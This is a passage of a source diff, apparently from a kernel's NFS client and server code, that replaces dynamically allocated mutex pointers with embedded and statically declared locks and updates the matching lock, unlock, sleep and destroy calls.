+                       msleep(cp, &cp->gss_clnt_mtx, slpflag | PDROP, "seqwin", NULL);
                        slpflag &= ~PCATCH;
                        if ((error = nfs_sigintr(req->r_nmp, req, req->r_thread, 0))) {
                                return error;
                        }
-                       lck_mtx_lock(cp->gss_clnt_mtx);
+                       lck_mtx_lock(&cp->gss_clnt_mtx);
                        if (cp->gss_clnt_flags & GSS_CTX_INVAL) {
                                /* Renewed while while we were waiting */
-                               lck_mtx_unlock(cp->gss_clnt_mtx);
+                               lck_mtx_unlock(&cp->gss_clnt_mtx);
                                nfs_gss_clnt_ctx_unref(req);
                                goto retry;
                        }
                }
                seqnum = ++cp->gss_clnt_seqnum;
                win_setbit(cp->gss_clnt_seqbits, seqnum % cp->gss_clnt_seqwin);
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
 
                MALLOC(gsp, struct gss_seq *, sizeof(*gsp), M_TEMP, M_WAITOK | M_ZERO);
                if (gsp == NULL) {
@@ -1489,9 +1482,9 @@ retry:
        /*
         * The context is apparently established successfully
         */
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        cp->gss_clnt_flags |= GSS_CTX_COMPLETE;
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
        cp->gss_clnt_proc = RPCSEC_GSS_DATA;
 
        network_seqnum = htonl(cp->gss_clnt_seqwin);
@@ -1543,7 +1536,7 @@ nfsmout:
         * It will be removed when the reference count
         * drops to zero.
         */
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        if (error) {
                cp->gss_clnt_flags |= GSS_CTX_INVAL;
        }
@@ -1556,7 +1549,7 @@ nfsmout:
                cp->gss_clnt_flags &= ~GSS_NEEDCTX;
                wakeup(cp);
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 
        NFS_GSS_DBG("Returning error = %d\n", error);
        return error;
@@ -1620,7 +1613,7 @@ bad:
        /*
         * Give up on this context
         */
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        cp->gss_clnt_flags |= GSS_CTX_INVAL;
 
        /*
@@ -1631,7 +1624,7 @@ bad:
                cp->gss_clnt_flags &= ~GSS_NEEDCTX;
                wakeup(cp);
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 
        return error;
 }
@@ -2214,7 +2207,7 @@ nfs_gss_clnt_rpcdone(struct nfsreq *req)
         * sequence number window to indicate it's done.
         * We do this even if the request timed out.
         */
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        gsp = SLIST_FIRST(&req->r_gss_seqlist);
        if (gsp && gsp->gss_seqnum > (cp->gss_clnt_seqnum - cp->gss_clnt_seqwin)) {
                win_resetbit(cp->gss_clnt_seqbits,
@@ -2239,7 +2232,7 @@ nfs_gss_clnt_rpcdone(struct nfsreq *req)
                cp->gss_clnt_flags &= ~GSS_NEEDSEQ;
                wakeup(cp);
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 }
 
 /*
@@ -2251,9 +2244,9 @@ nfs_gss_clnt_ctx_ref(struct nfsreq *req, struct nfs_gss_clnt_ctx *cp)
 {
        req->r_gss_ctx = cp;
 
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        cp->gss_clnt_refcnt++;
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 }
 
 /*
@@ -2278,7 +2271,7 @@ nfs_gss_clnt_ctx_unref(struct nfsreq *req)
 
        req->r_gss_ctx = NULL;
 
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        if (--cp->gss_clnt_refcnt < 0) {
                panic("Over release of gss context!\n");
        }
@@ -2305,7 +2298,7 @@ nfs_gss_clnt_ctx_unref(struct nfsreq *req)
                cp->gss_clnt_nctime = now.tv_sec;
                neg_cache = 1;
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
        if (destroy) {
                NFS_GSS_DBG("Destroying context %s\n", NFS_GSS_CTX(req, cp));
                if (nmp) {
@@ -2364,12 +2357,12 @@ nfs_gss_clnt_ctx_neg_cache_reap(struct nfsmount *nmp)
                        continue;
                }
                /* Not referenced, remove it. */
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                if (cp->gss_clnt_refcnt == 0) {
                        cp->gss_clnt_flags |= GSS_CTX_DESTROY;
                        destroy = 1;
                }
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
                if (destroy) {
                        TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries);
                        nmp->nm_ncentries++;
@@ -2460,7 +2453,7 @@ nfs_gss_clnt_ctx_copy(struct nfs_gss_clnt_ctx *scp, struct nfs_gss_clnt_ctx **dc
                return ENOMEM;
        }
        bzero(dcp, sizeof(struct nfs_gss_clnt_ctx));
-       dcp->gss_clnt_mtx = lck_mtx_alloc_init(nfs_gss_clnt_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&dcp->gss_clnt_mtx, &nfs_gss_clnt_grp, LCK_ATTR_NULL);
        dcp->gss_clnt_cred = scp->gss_clnt_cred;
        kauth_cred_ref(dcp->gss_clnt_cred);
        dcp->gss_clnt_prinlen = scp->gss_clnt_prinlen;
@@ -2500,10 +2493,8 @@ nfs_gss_clnt_ctx_destroy(struct nfs_gss_clnt_ctx *cp)
        host_release_special_port(cp->gss_clnt_mport);
        cp->gss_clnt_mport = IPC_PORT_NULL;
 
-       if (cp->gss_clnt_mtx) {
-               lck_mtx_destroy(cp->gss_clnt_mtx, nfs_gss_clnt_grp);
-               cp->gss_clnt_mtx = (lck_mtx_t *)NULL;
-       }
+       lck_mtx_destroy(&cp->gss_clnt_mtx, &nfs_gss_clnt_grp);
+
        if (IS_VALID_CRED(cp->gss_clnt_cred)) {
                kauth_cred_unref(&cp->gss_clnt_cred);
        }
@@ -2550,9 +2541,9 @@ nfs_gss_clnt_ctx_renew(struct nfsreq *req)
        }
        nmp = req->r_nmp;
 
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        if (cp->gss_clnt_flags & GSS_CTX_INVAL) {
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
                nfs_gss_clnt_ctx_unref(req);
                return 0;     // already being renewed
        }
@@ -2563,7 +2554,7 @@ nfs_gss_clnt_ctx_renew(struct nfsreq *req)
                cp->gss_clnt_flags &= ~GSS_NEEDSEQ;
                wakeup(cp);
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 
        if (cp->gss_clnt_proc == RPCSEC_GSS_DESTROY) {
                return EACCES;  /* Destroying a context is best effort. Don't renew. */
@@ -2623,13 +2614,13 @@ nfs_gss_clnt_ctx_unmount(struct nfsmount *nmp)
        while ((cp = TAILQ_FIRST(&nmp->nm_gsscl))) {
                TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries);
                cp->gss_clnt_entries.tqe_next = NFSNOLIST;
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                if (cp->gss_clnt_flags & GSS_CTX_DESTROY) {
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        continue;
                }
                cp->gss_clnt_refcnt++;
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
                req->r_gss_ctx = cp;
 
                lck_mtx_unlock(&nmp->nm_lock);
@@ -2659,9 +2650,9 @@ nfs_gss_clnt_ctx_unmount(struct nfsmount *nmp)
                 * the reference to remove it if its
                 * refcount is zero.
                 */
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY);
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
                nfs_gss_clnt_ctx_unref(req);
                lck_mtx_lock(&nmp->nm_lock);
        }
@@ -2687,19 +2678,19 @@ nfs_gss_clnt_ctx_remove(struct nfsmount *nmp, kauth_cred_t cred)
        NFS_GSS_CLNT_CTX_DUMP(nmp);
        lck_mtx_lock(&nmp->nm_lock);
        TAILQ_FOREACH_SAFE(cp, &nmp->nm_gsscl, gss_clnt_entries, tcp) {
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, cred)) {
                        if (cp->gss_clnt_flags & GSS_CTX_DESTROY) {
                                NFS_GSS_DBG("Found destroyed context %d/%d. refcnt = %d continuing\n",
                                    kauth_cred_getasid(cp->gss_clnt_cred),
                                    kauth_cred_getauid(cp->gss_clnt_cred),
                                    cp->gss_clnt_refcnt);
-                               lck_mtx_unlock(cp->gss_clnt_mtx);
+                               lck_mtx_unlock(&cp->gss_clnt_mtx);
                                continue;
                        }
                        cp->gss_clnt_refcnt++;
                        cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY);
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        req->r_gss_ctx = cp;
                        lck_mtx_unlock(&nmp->nm_lock);
                        /*
@@ -2714,7 +2705,7 @@ nfs_gss_clnt_ctx_remove(struct nfsmount *nmp, kauth_cred_t cred)
                        NFS_ZFREE(nfs_req_zone, req);
                        return 0;
                }
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
        }
 
        lck_mtx_unlock(&nmp->nm_lock);
@@ -2783,20 +2774,20 @@ nfs_gss_clnt_ctx_get_principal(struct nfsmount *nmp, vfs_context_t ctx,
        req->r_nmp = nmp;
        lck_mtx_lock(&nmp->nm_lock);
        TAILQ_FOREACH(cp, &nmp->nm_gsscl, gss_clnt_entries) {
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                if (cp->gss_clnt_flags & GSS_CTX_DESTROY) {
                        NFS_GSS_DBG("Found destroyed context %s refcnt = %d continuing\n",
                            NFS_GSS_CTX(req, cp),
                            cp->gss_clnt_refcnt);
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        continue;
                }
                if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, cred)) {
                        cp->gss_clnt_refcnt++;
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        goto out;
                }
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
        }
 
 out:
@@ -2876,7 +2867,7 @@ nfs_gss_svc_ctx_find(uint32_t handle)
         */
        clock_interval_to_deadline(GSS_CTX_PEND, NSEC_PER_SEC, &timenow);
 
-       lck_mtx_lock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_lock(&nfs_gss_svc_ctx_mutex);
 
        LIST_FOREACH(cp, head, gss_svc_entries) {
                if (cp->gss_svc_handle == handle) {
@@ -2896,14 +2887,14 @@ nfs_gss_svc_ctx_find(uint32_t handle)
                                cp = NULL;
                                break;
                        }
-                       lck_mtx_lock(cp->gss_svc_mtx);
+                       lck_mtx_lock(&cp->gss_svc_mtx);
                        cp->gss_svc_refcnt++;
-                       lck_mtx_unlock(cp->gss_svc_mtx);
+                       lck_mtx_unlock(&cp->gss_svc_mtx);
                        break;
                }
        }
 
-       lck_mtx_unlock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_unlock(&nfs_gss_svc_ctx_mutex);
 
        return cp;
 }
@@ -2918,7 +2909,7 @@ nfs_gss_svc_ctx_insert(struct nfs_gss_svc_ctx *cp)
        struct nfs_gss_svc_ctx_hashhead *head;
        struct nfs_gss_svc_ctx *p;
 
-       lck_mtx_lock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_lock(&nfs_gss_svc_ctx_mutex);
 
        /*
         * Give the client a random handle so that if we reboot
@@ -2948,7 +2939,7 @@ retry:
                    min(GSS_TIMER_PERIOD, max(GSS_CTX_TTL_MIN, nfsrv_gss_context_ttl)) * MSECS_PER_SEC);
        }
 
-       lck_mtx_unlock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_unlock(&nfs_gss_svc_ctx_mutex);
 }
 
 /*
@@ -2964,7 +2955,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2)
        int contexts = 0;
        int i;
 
-       lck_mtx_lock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_lock(&nfs_gss_svc_ctx_mutex);
        clock_get_uptime(&timenow);
 
        NFS_GSS_DBG("is running\n");
@@ -2990,7 +2981,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2)
                                if (cp->gss_svc_seqbits) {
                                        FREE(cp->gss_svc_seqbits, M_TEMP);
                                }
-                               lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp);
+                               lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp);
                                FREE(cp, M_TEMP);
                                contexts--;
                        }
@@ -3009,7 +3000,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2)
                    min(GSS_TIMER_PERIOD, max(GSS_CTX_TTL_MIN, nfsrv_gss_context_ttl)) * MSECS_PER_SEC);
        }
 
-       lck_mtx_unlock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_unlock(&nfs_gss_svc_ctx_mutex);
 }
 
 /*
@@ -3094,7 +3085,7 @@ nfs_gss_svc_cred_get(struct nfsrv_descript *nd, struct nfsm_chain *nmc)
                        error = ENOMEM;
                        goto nfsmout;
                }
-               cp->gss_svc_mtx = lck_mtx_alloc_init(nfs_gss_svc_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&cp->gss_svc_mtx, &nfs_gss_svc_grp, LCK_ATTR_NULL);
                cp->gss_svc_refcnt = 1;
        } else {
                /*
@@ -3328,7 +3319,7 @@ nfs_gss_svc_cred_get(struct nfsrv_descript *nd, struct nfsm_chain *nmc)
                }
                if (error) {
                        if (proc == RPCSEC_GSS_INIT) {
-                               lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp);
+                               lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp);
                                FREE(cp, M_TEMP);
                                cp = NULL;
                        }
@@ -3571,10 +3562,10 @@ nfs_gss_svc_ctx_init(struct nfsrv_descript *nd, struct nfsrv_sock *slp, mbuf_t *
                cp = nfs_gss_svc_ctx_find(cp->gss_svc_handle);
                if (cp != NULL) {
                        cp->gss_svc_handle = 0; // so it can't be found
-                       lck_mtx_lock(cp->gss_svc_mtx);
+                       lck_mtx_lock(&cp->gss_svc_mtx);
                        clock_interval_to_deadline(GSS_CTX_PEND, NSEC_PER_SEC,
                            &cp->gss_svc_incarnation);
-                       lck_mtx_unlock(cp->gss_svc_mtx);
+                       lck_mtx_unlock(&cp->gss_svc_mtx);
                }
                break;
        default:
@@ -3621,7 +3612,7 @@ nfsmout:
                if (cp->gss_svc_token != NULL) {
                        FREE(cp->gss_svc_token, M_TEMP);
                }
-               lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp);
+               lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp);
                FREE(cp, M_TEMP);
        }
 
@@ -3778,7 +3769,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq)
        uint32_t win = cp->gss_svc_seqwin;
        uint32_t i;
 
-       lck_mtx_lock(cp->gss_svc_mtx);
+       lck_mtx_lock(&cp->gss_svc_mtx);
 
        /*
         * If greater than the window upper bound,
@@ -3794,7 +3785,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq)
                }
                win_setbit(bits, seq % win);
                cp->gss_svc_seqmax = seq;
-               lck_mtx_unlock(cp->gss_svc_mtx);
+               lck_mtx_unlock(&cp->gss_svc_mtx);
                return 1;
        }
 
@@ -3802,7 +3793,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq)
         * Invalid if below the lower bound of the window
         */
        if (seq <= cp->gss_svc_seqmax - win) {
-               lck_mtx_unlock(cp->gss_svc_mtx);
+               lck_mtx_unlock(&cp->gss_svc_mtx);
                return 0;
        }
 
@@ -3810,11 +3801,11 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq)
         * In the window, invalid if the bit is already set
         */
        if (win_getbit(bits, seq % win)) {
-               lck_mtx_unlock(cp->gss_svc_mtx);
+               lck_mtx_unlock(&cp->gss_svc_mtx);
                return 0;
        }
        win_setbit(bits, seq % win);
-       lck_mtx_unlock(cp->gss_svc_mtx);
+       lck_mtx_unlock(&cp->gss_svc_mtx);
        return 1;
 }
 
@@ -3828,13 +3819,13 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq)
 void
 nfs_gss_svc_ctx_deref(struct nfs_gss_svc_ctx *cp)
 {
-       lck_mtx_lock(cp->gss_svc_mtx);
+       lck_mtx_lock(&cp->gss_svc_mtx);
        if (cp->gss_svc_refcnt > 0) {
                cp->gss_svc_refcnt--;
        } else {
                printf("nfs_gss_ctx_deref: zero refcount\n");
        }
-       lck_mtx_unlock(cp->gss_svc_mtx);
+       lck_mtx_unlock(&cp->gss_svc_mtx);
 }
 
 /*
@@ -3847,7 +3838,7 @@ nfs_gss_svc_cleanup(void)
        struct nfs_gss_svc_ctx *cp, *ncp;
        int i;
 
-       lck_mtx_lock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_lock(&nfs_gss_svc_ctx_mutex);
 
        /*
         * Run through all the buckets
@@ -3862,12 +3853,12 @@ nfs_gss_svc_cleanup(void)
                        if (cp->gss_svc_seqbits) {
                                FREE(cp->gss_svc_seqbits, M_TEMP);
                        }
-                       lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp);
+                       lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp);
                        FREE(cp, M_TEMP);
                }
        }
 
-       lck_mtx_unlock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_unlock(&nfs_gss_svc_ctx_mutex);
 }
 
 #endif /* CONFIG_NFS_SERVER */
index 01aaabee7fa435db94778d156106ae6b5e8dd550..05680ef89b79a909e90a8984b9437b6ecfe2f05c 100644 (file)
@@ -85,7 +85,7 @@ extern u_char krb5_mech_oid[11];
  * The client's RPCSEC_GSS context information
  */
 struct nfs_gss_clnt_ctx {
-       lck_mtx_t               *gss_clnt_mtx;
+       lck_mtx_t               gss_clnt_mtx;
        thread_t                gss_clnt_thread;        // Thread creating context
        TAILQ_ENTRY(nfs_gss_clnt_ctx)   gss_clnt_entries;
        uint32_t                gss_clnt_flags;         // Flag bits - see below
@@ -135,7 +135,7 @@ struct nfs_gss_clnt_ctx {
  * The server's RPCSEC_GSS context information
  */
 struct nfs_gss_svc_ctx {
-       lck_mtx_t               *gss_svc_mtx;
+       lck_mtx_t               gss_svc_mtx;
        LIST_ENTRY(nfs_gss_svc_ctx)     gss_svc_entries;
        uint32_t                gss_svc_handle;         // Identifies server context to client
        uint32_t                gss_svc_refcnt;         // Reference count
index 4b0d196312b6165e1284806c450a95f02b5f7b8a..5872d18409185a73519666b0daee26fa47e97d29 100644 (file)
@@ -103,13 +103,14 @@ extern void ipc_port_release_send(ipc_port_t);
  * kept sorted by transaction ID (xid).
  */
 static uint64_t nfs_lockxid = 0;
-static LOCKD_MSG_QUEUE nfs_pendlockq;
+static LOCKD_MSG_QUEUE nfs_pendlockq = TAILQ_HEAD_INITIALIZER(nfs_pendlockq);
 
 /* list of mounts that are (potentially) making lockd requests */
-TAILQ_HEAD(nfs_lockd_mount_list, nfsmount) nfs_lockd_mount_list;
+TAILQ_HEAD(nfs_lockd_mount_list, nfsmount) nfs_lockd_mount_list =
+    TAILQ_HEAD_INITIALIZER(nfs_lockd_mount_list);
 
-static lck_grp_t *nfs_lock_lck_grp;
-static lck_mtx_t *nfs_lock_mutex;
+static LCK_GRP_DECLARE(nfs_lock_lck_grp, "nfs_lock");
+static LCK_MTX_DECLARE(nfs_lock_mutex, &nfs_lock_lck_grp);
 
 void nfs_lockdmsg_enqueue(LOCKD_MSG_REQUEST *);
 void nfs_lockdmsg_dequeue(LOCKD_MSG_REQUEST *);
@@ -119,29 +120,16 @@ LOCKD_MSG_REQUEST *nfs_lockdmsg_find_by_xid(uint64_t);
 uint64_t nfs_lockxid_get(void);
 int nfs_lockd_send_request(LOCKD_MSG *, int);
 
-/*
- * initialize global nfs lock state
- */
-void
-nfs_lockinit(void)
-{
-       TAILQ_INIT(&nfs_pendlockq);
-       TAILQ_INIT(&nfs_lockd_mount_list);
-
-       nfs_lock_lck_grp = lck_grp_alloc_init("nfs_lock", LCK_GRP_ATTR_NULL);
-       nfs_lock_mutex = lck_mtx_alloc_init(nfs_lock_lck_grp, LCK_ATTR_NULL);
-}
-
 /*
  * Register a mount as (potentially) making lockd requests.
  */
 void
 nfs_lockd_mount_register(struct nfsmount *nmp)
 {
-       lck_mtx_lock(nfs_lock_mutex);
+       lck_mtx_lock(&nfs_lock_mutex);
        TAILQ_INSERT_HEAD(&nfs_lockd_mount_list, nmp, nm_ldlink);
        nfs_lockd_mounts++;
-       lck_mtx_unlock(nfs_lock_mutex);
+       lck_mtx_unlock(&nfs_lock_mutex);
 }
 
 /*
@@ -157,9 +145,9 @@ nfs_lockd_mount_unregister(struct nfsmount *nmp)
        mach_port_t lockd_port = IPC_PORT_NULL;
        kern_return_t kr;
 
-       lck_mtx_lock(nfs_lock_mutex);
+       lck_mtx_lock(&nfs_lock_mutex);
        if (nmp->nm_ldlink.tqe_next == NFSNOLIST) {
-               lck_mtx_unlock(nfs_lock_mutex);
+               lck_mtx_unlock(&nfs_lock_mutex);
                return;
        }
 
@@ -174,7 +162,7 @@ nfs_lockd_mount_unregister(struct nfsmount *nmp)
                nfs_lockd_request_sent = 0;
        }
 
-       lck_mtx_unlock(nfs_lock_mutex);
+       lck_mtx_unlock(&nfs_lock_mutex);
 
        if (!send_shutdown) {
                return;
@@ -463,7 +451,7 @@ nfs3_lockd_request(
        interruptable = NMFLAG(nmp, INTR);
        lck_mtx_unlock(&nmp->nm_lock);
 
-       lck_mtx_lock(nfs_lock_mutex);
+       lck_mtx_lock(&nfs_lock_mutex);
 
        /* allocate unique xid */
        msg->lm_xid = nfs_lockxid_get();
@@ -475,9 +463,9 @@ nfs3_lockd_request(
                nfs_lockd_request_sent = 1;
 
                /* need to drop nfs_lock_mutex while calling nfs_lockd_send_request() */
-               lck_mtx_unlock(nfs_lock_mutex);
+               lck_mtx_unlock(&nfs_lock_mutex);
                error = nfs_lockd_send_request(msg, interruptable);
-               lck_mtx_lock(nfs_lock_mutex);
+               lck_mtx_lock(&nfs_lock_mutex);
                if (error && error != EAGAIN) {
                        break;
                }
@@ -507,7 +495,7 @@ wait_for_granted:
                while (now.tv_sec < endtime) {
                        error = error2 = 0;
                        if (!msgreq->lmr_answered) {
-                               error = msleep(msgreq, nfs_lock_mutex, slpflag | PUSER, "lockd", &ts);
+                               error = msleep(msgreq, &nfs_lock_mutex, slpflag | PUSER, "lockd", &ts);
                                slpflag = 0;
                        }
                        if (msgreq->lmr_answered) {
@@ -736,7 +724,7 @@ wait_for_granted:
                         * for this mount.
                         */
                        nfs_lockdmsg_dequeue(msgreq);
-                       lck_mtx_unlock(nfs_lock_mutex);
+                       lck_mtx_unlock(&nfs_lock_mutex);
                        lck_mtx_lock(&nmp->nm_lock);
                        if (nmp->nm_lockmode == NFS_LOCK_MODE_ENABLED) {
                                nmp->nm_lockmode = NFS_LOCK_MODE_DISABLED;
@@ -763,7 +751,7 @@ wait_for_granted:
 
        nfs_lockdmsg_dequeue(msgreq);
 
-       lck_mtx_unlock(nfs_lock_mutex);
+       lck_mtx_unlock(&nfs_lock_mutex);
 
        return error;
 }
@@ -941,7 +929,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp)
                return EINVAL;
        }
 
-       lck_mtx_lock(nfs_lock_mutex);
+       lck_mtx_lock(&nfs_lock_mutex);
 
        /* try to find the lockd message by transaction id (cookie) */
        msgreq = nfs_lockdmsg_find_by_xid(ansp->la_xid);
@@ -964,7 +952,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp)
                }
        }
        if (!msgreq) {
-               lck_mtx_unlock(nfs_lock_mutex);
+               lck_mtx_unlock(&nfs_lock_mutex);
                return EPIPE;
        }
 
@@ -988,7 +976,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp)
        }
 
        msgreq->lmr_answered = 1;
-       lck_mtx_unlock(nfs_lock_mutex);
+       lck_mtx_unlock(&nfs_lock_mutex);
        wakeup(msgreq);
 
        return 0;
@@ -1029,7 +1017,7 @@ nfslockdnotify(proc_t p, user_addr_t argp)
        argp += headsize;
        saddr = (struct sockaddr *)&ln.ln_addr[0];
 
-       lck_mtx_lock(nfs_lock_mutex);
+       lck_mtx_lock(&nfs_lock_mutex);
 
        for (i = 0; i < ln.ln_addrcount; i++) {
                error = copyin(argp, &ln.ln_addr[0], sizeof(ln.ln_addr[0]));
@@ -1050,7 +1038,7 @@ nfslockdnotify(proc_t p, user_addr_t argp)
                }
        }
 
-       lck_mtx_unlock(nfs_lock_mutex);
+       lck_mtx_unlock(&nfs_lock_mutex);
 
        return error;
 }
index b360849e699445b6cd92a90b452bb45d4b609f99..7e4b0759010c56aacfff1ffbed57fea6c821c803 100644 (file)
@@ -144,7 +144,6 @@ struct lockd_notify {
 
 
 #ifdef KERNEL
-void    nfs_lockinit(void);
 void    nfs_lockd_mount_register(struct nfsmount *);
 void    nfs_lockd_mount_unregister(struct nfsmount *);
 int     nfs3_lockd_request(nfsnode_t, int, LOCKD_MSG_REQUEST *, int, thread_t);
index c47fa9263ed17c9f214118347057aa56b2f074b3..84745f933dab1fb14dd7452676a475a2ed929059 100644 (file)
 static LIST_HEAD(nfsnodehashhead, nfsnode) * nfsnodehashtbl;
 static u_long nfsnodehash;
 
-static lck_grp_t *nfs_node_hash_lck_grp;
-static lck_grp_t *nfs_node_lck_grp;
-static lck_grp_t *nfs_data_lck_grp;
-lck_mtx_t *nfs_node_hash_mutex;
+static LCK_GRP_DECLARE(nfs_node_hash_lck_grp, "nfs_node_hash");
+static LCK_GRP_DECLARE(nfs_node_lck_grp, "nfs_node");
+static LCK_GRP_DECLARE(nfs_data_lck_grp, "nfs_data");
+LCK_MTX_DECLARE(nfs_node_hash_mutex, &nfs_node_hash_lck_grp);
 
 ZONE_DECLARE(nfsnode_zone, "NFS node",
     sizeof(struct nfsnode), ZC_ZFREE_CLEARMEM);
 
 #define NFS_NODE_DBG(...) NFS_DBG(NFS_FAC_NODE, 7, ## __VA_ARGS__)
 
-/*
- * Initialize hash links for nfsnodes
- * and build nfsnode free list.
- */
-void
-nfs_nhinit(void)
-{
-       nfs_node_hash_lck_grp = lck_grp_alloc_init("nfs_node_hash", LCK_GRP_ATTR_NULL);
-       nfs_node_hash_mutex = lck_mtx_alloc_init(nfs_node_hash_lck_grp, LCK_ATTR_NULL);
-       nfs_node_lck_grp = lck_grp_alloc_init("nfs_node", LCK_GRP_ATTR_NULL);
-       nfs_data_lck_grp = lck_grp_alloc_init("nfs_data", LCK_GRP_ATTR_NULL);
-}
-
 void
 nfs_nhinit_finish(void)
 {
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        if (!nfsnodehashtbl) {
                nfsnodehashtbl = hashinit(desiredvnodes, M_NFSNODE, &nfsnodehash);
        }
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 }
 
 /*
@@ -226,7 +213,7 @@ nfs_nget(
        cn_namelen = cnp ? cnp->cn_namelen : 0;
        nfshash = nfs_hash(fhp, fhsize);
 loop:
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        nhpp = NFSNOHASH(nfshash);
        for (np = nhpp->lh_first; np != 0; np = np->n_hash.le_next) {
                mp2 = (np->n_hflag & NHINIT) ? np->n_mount : NFSTOMP(np);
@@ -256,13 +243,13 @@ loop:
                if ((np->n_hflag & NHINIT) || ((np->n_hflag & NHLOCKED) && !(flags & NG_NOCREATE))) {
                        np->n_hflag |= NHLOCKWANT;
                        FSDBG(263, dnp, np, np->n_flag, 0xcace2222);
-                       msleep(np, nfs_node_hash_mutex, PDROP | PINOD, "nfs_nget", NULL);
+                       msleep(np, &nfs_node_hash_mutex, PDROP | PINOD, "nfs_nget", NULL);
                        FSDBG(263, dnp, np, np->n_flag, 0xcace3333);
                        goto loop;
                }
                vp = NFSTOV(np);
                vid = vnode_vid(vp);
